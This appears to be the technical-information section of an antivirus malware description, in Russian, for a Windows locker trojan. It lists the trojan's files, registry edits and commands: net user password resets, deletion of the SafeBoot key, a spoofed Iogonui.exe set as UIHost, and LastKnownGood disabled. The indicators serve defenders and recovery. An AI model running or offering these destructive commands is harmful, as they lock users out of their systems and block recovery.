Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'password_off' = '%TEMP%\password_off.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'UIHost' = ''
- %TEMP%\password_on.exe
- %TEMP%\artmoney.exe
- <SYSTEM32>\net1.exe user %USERNAME% "Путин, вор!"
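- <SYSTEM32>\reg.exe delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot" /f
  (Примечание: удаление ключа SafeBoot делает невозможной загрузку Windows в безопасном режиме; при восстановлении системы этот ключ нужно вернуть, например из резервной копии реестра.)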
- <SYSTEM32>\net1.exe user администратор "Путин, вор!"
- <SYSTEM32>\net1.exe user admin "Путин, вор!"
- <SYSTEM32>\net1.exe user админ "Путин, вор!"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\password_on.bat" "
- <SYSTEM32>\wscript.exe "%TEMP%\password_on.vbs"
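- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v UIHost /t REG_EXPAND_SZ /d Iogonui.exe /f
  (Примечание: имя файла Iogonui.exe начинается с заглавной латинской «I», а не со строчной «l», то есть имитирует системный logonui.exe; при проверке значения UIHost и файлов в <SYSTEM32> сравнивайте имя посимвольно.)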
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 0 /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v password_off /t REG_SZ /d %TEMP%\password_off.exe /f
- %TEMP%\password_on.vbs
- %TEMP%\password_on.exe
- <SYSTEM32>\Iogonui.exe
- %TEMP%\password_on.bat
- %TEMP%\password_off.exe
- %TEMP%\artmoney.exe
- %TEMP%\backgroundDefault.jpg
- %TEMP%\Iogonui.exe
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''